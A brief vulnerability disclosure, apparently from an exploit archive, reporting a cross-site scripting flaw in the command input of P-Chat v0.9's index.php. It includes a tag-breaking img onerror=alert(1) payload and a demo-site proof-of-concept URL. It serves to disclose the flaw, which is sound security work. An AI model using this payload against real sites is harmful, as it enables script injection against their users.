# Exploit Title: P-Chat v0.9 XSS Vulnerability
# Date: 2012
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
Cross Site Scripting can be done using the command input
Vulnerable Page:
index.php (XSS)
Example:
"/></a></><img src=eyup.gif onerror=alert(1)> (XSS Code)
POC:
http://limscripts.hostoi.com/demos/p-chat/index.php
Thanks,
Eyup CELIK
Information Technology Security Specialist
http://www.eyupcelik.com.tr
